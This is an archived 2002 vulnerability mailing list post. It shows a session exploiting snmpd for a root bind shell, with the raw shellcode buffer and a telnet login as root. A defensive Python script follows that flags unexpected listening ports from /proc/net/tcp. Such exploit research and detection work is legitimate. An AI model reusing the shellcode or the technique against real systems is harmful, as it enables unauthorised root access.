Vulnerability Development mailing list archives
Re: snmpd exploit examination - snmpwalk
From: xbud <xbud () g0thead com>
Date: Thu, 21 Feb 2002 17:05:02 -0600
That's great..
but how would you explain a root shell sitting on a port I defined in an
exploit I didn't release?
Note! I still haven't tested the "Zen-Parse" one.
[root@dejaking /root]# snmpd
[root@dejaking /root]# whereis snmpd
snmpd: /usr/sbin/snmpd /usr/man/man1/snmpd.1.gz
[root@dejaking /root]# ps -ef | grep snmpd
root 15027 1 6 18:05 pts/2 00:00:00 snmpd
root 15030 14973 0 18:05 pts/2 00:00:00 grep snmpd
[root@dejaking /root]# gdb /usr/sbin/snmpd
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) at 15027
Attaching to program: /usr/sbin/snmpd, Pid 15027
Reading symbols from /usr/lib/libucdagent.so.0...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libucdmibs.so.0...(no debugging symbols
found)...
done.
<snip>
0x4020c17e in __select () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) c
Continuing.
: command not found
[xbud@dejaking xbud]$ ./ecksploit -20
sizeof(buffer) = 256
ret = 0xbfffd61c
buffer =
Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ
¿Öÿ¿å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî'MðEì
EøÆEüÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍÐAÍë?^1ÀFE
°
óU
Íèãÿÿÿ/bin/shÿ¿
Timeout: No Response from 127.0.0.1
[xbud@dejaking xbud]$ netstat -an --tcp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3879 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6011 0.0.0.0:* LISTEN
tcp 0 0 xx.xx.xx.xx:22 24.28.xx.xx:64408 ESTABLISHED
tcp 0 0 0.0.0.0:6010 0.0.0.0:* LISTEN
tcp 0 0 xx.xx.xx.xx:22 24.28.xx.xx:64407 ESTABLISHED
[xbud@dejaking xbud]$ telnet localhost 3879
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
(wheel)
pwd;
/root
cheers,
xbud
Tested on both 4.1.1 and 4.0.1 source and default installs.
cheers
On Wednesday 20 February 2002 03:14 pm, you wrote:
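The session above shows the tell-tale sign of this class of exploit from the defender's side: a root-owned daemon is attacked, and a new TCP listener (port 3879 here) appears that was not in the host's baseline. The following is an added example, not code from the post or from any of the exploit authors in the thread, of the check an administrator would run to catch that: it parses /proc/net/tcp (the kernel table netstat reads), decodes the little-endian hex endpoints, keeps only sockets in the LISTEN state and reports any whose port is not in an assumed baseline allowlist. The sample table is constructed to mirror the netstat output in the post; the baseline set of expected ports is an assumption for the demo.

```python
"""Flag unexpected listening TCP sockets by parsing /proc/net/tcp.

Added example, not part of the original post. The baseline of expected
listening ports is an assumption for this demo; in practice it would be
loaded from host inventory or a saved snapshot taken at install time.
"""
import socket
import struct

LISTEN_STATE = 0x0A  # value of the 'st' column for a listening socket

# Constructed sample of /proc/net/tcp mirroring the post's netstat output:
# sshd on 22, two X11-forwarding listeners (6010/6011) owned by uid 500,
# an established ssh session, and a root-owned (uid 0) listener on 3879.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 00000000 100 0 0 10 0
   1: 0100007F:177A 00000000:0000 0A 00000000:00000000 00:00000000 00000000   500        0 1002 1 00000000 100 0 0 10 0
   2: 0100007F:177B 00000000:0000 0A 00000000:00000000 00:00000000 00000000   500        0 1003 1 00000000 100 0 0 10 0
   3: 00000000:0F27 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1004 1 00000000 100 0 0 10 0
   4: 0A000001:0016 18001C02:FB98 01 00000000:00000000 00:00000000 00000000     0        0 1005 1 00000000 100 0 0 10 0
"""

# Assumed baseline for this host: sshd plus the X11 forwarding ports.
EXPECTED_PORTS = {22, 6010, 6011}


def decode_endpoint(hex_endpoint):
    """Turn '0100007F:0F27' into ('127.0.0.1', 3879).

    /proc/net/tcp stores IPv4 addresses as a little-endian 32-bit hex word
    on x86, so the bytes must be reordered before printing.
    """
    addr_hex, port_hex = hex_endpoint.split(":")
    packed = struct.pack("<I", int(addr_hex, 16))
    return socket.inet_ntoa(packed), int(port_hex, 16)


def parse_listeners(proc_tcp_text):
    """Return every LISTEN socket as a dict with addr, port and owning uid."""
    listeners = []
    for line in proc_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 8:
            continue
        addr, port = decode_endpoint(fields[1])  # local_address column
        state = int(fields[3], 16)                # st column
        uid = int(fields[7])                      # uid column
        if state == LISTEN_STATE:
            listeners.append({"addr": addr, "port": port, "uid": uid})
    return listeners


def unexpected_listeners(proc_tcp_text, expected_ports):
    """Listeners whose port is not in the baseline; root-owned ones matter most."""
    return [entry for entry in parse_listeners(proc_tcp_text)
            if entry["port"] not in expected_ports]


def check_live_host(expected_ports, path="/proc/net/tcp"):
    """Run the same check against the running kernel's table (Linux only)."""
    with open(path) as fh:
        return unexpected_listeners(fh.read(), expected_ports)


if __name__ == "__main__":
    for entry in unexpected_listeners(SAMPLE_PROC_NET_TCP, EXPECTED_PORTS):
        owner = "ROOT" if entry["uid"] == 0 else "uid %d" % entry["uid"]
        print("unexpected listener %s:%d (%s)" % (entry["addr"], entry["port"], owner))
```

Run periodically (cron, or from the monitoring agent) and alert on any hit; a listener owned by uid 0 that matches no known service is exactly the shape of the bind shell shown in the post. Pair it with /proc/net/tcp6 for IPv6 hosts, and keep the baseline outside the monitored host so an attacker with root cannot simply edit it.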